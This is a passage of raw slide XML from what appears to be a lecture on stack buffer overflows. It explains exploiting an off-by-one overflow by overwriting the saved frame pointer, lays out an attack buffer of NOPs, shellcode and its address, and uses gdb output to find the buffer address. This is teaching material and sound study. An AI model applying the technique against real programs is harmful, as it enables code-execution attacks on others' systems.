              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack pointer takes frame pointer’s value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we can control the frame pointer we can control the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack pointer is now (frame pointer + 4 bytes) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The saved program counter is popped from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program counter becomes *(original frame pointer + 4 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158054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23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23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23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23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23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230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230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23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4354" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploiting an Off-by-one Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By modifying the value of the saved frame pointer it is possible to provide an arbitrary value for the new stack pointer, and, in turn, for the value to be popped into the program counter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be exploited to jump to attacker-supplied code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attack buffer is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nops</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lowest order byte of frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79705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43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43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43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43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43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435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43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02" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="1885950"/>
            <a:ext cx="2057400" cy="3657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1126403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="32575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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126404" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="38290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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126405" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="45148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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126406" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="52578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nops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126407" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="55435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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="4171950"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126409" name="Oval 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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26410" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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26411" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126412" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="29718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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126413" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="20574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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126414" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2343150"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126415" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="2057400"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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26416" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="2971800"/>
            <a:ext cx="152400" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 208333"/>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26417" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894661" y="24608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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126418" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894661" y="42896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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126419" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="3257550"/>
            <a:ext cx="533400" cy="285750"/>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1126420" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4800600" y="3371850"/>
            <a:ext cx="1219200" cy="5715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sz="1600">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126421" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="31432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ebp[3]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126422" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="35433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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 23"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="4914900"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126424" name="Oval 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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26425" name="Oval 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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26426" name="Oval 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126428" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Smashing the Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="887807978"/>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450" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Finding the Buffer Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need to be able to determine the address of the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find stack pointer value (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) at start of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	Dump of assembler code for function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x8048134 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x8048135 &lt;func+1&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x8048137 &lt;func+3&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   $0x104,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x804813d &lt;func+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) break *0x804813d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	Breakpoint 1 at 0x804813d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) info register </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            0xbffffc60       0xbffffc60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;buffer = %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + 4 // the size of '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
